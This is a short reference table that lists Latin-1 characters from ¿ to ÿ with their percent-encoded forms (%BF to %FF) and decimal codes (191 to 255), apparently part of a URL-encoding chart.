¿ %BF 191
À %C0 192
Á %C1 193
 %C2 194
à %C3 195
Ä %C4 196
Å %C5 197
Æ %C6 198
Ç %C7 199
È %C8 200
É %C9 201
Ê %CA 202
Ë %CB 203
Ì %CC 204
Í %CD 205
Î %CE 206
Ï %CF 207
Ð %D0 208
Ñ %D1 209
Ò %D2 210
Ó %D3 211
Ô %D4 212
Õ %D5 213
Ö %D6 214
× %D7 215
Ø %D8 216
Ù %D9 217
Ú %DA 218
Û %DB 219
Ü %DC 220
Ý %DD 221
Þ %DE 222
ß %DF 223
à %E0 224
á %E1 225
â %E2 226
ã %E3 227
ä %E4 228
å %E5 229
æ %E6 230
ç %E7 231
è %E8 232
é %E9 233
ê %EA 234
ë %EB 235
ì %EC 236
í %ED 237
î %EE 238
ï %EF 239
ð %F0 240
ñ %F1 241
ò %F2 242
ó %F3 243
ô %F4 244
õ %F5 245
ö %F6 246
÷ %F7 247
ø %F8 248
ù %F9 249
ú %FA 250
û %FB 251
ü %FC 252
ý %FD 253
þ %FE 254
ÿ %FF 255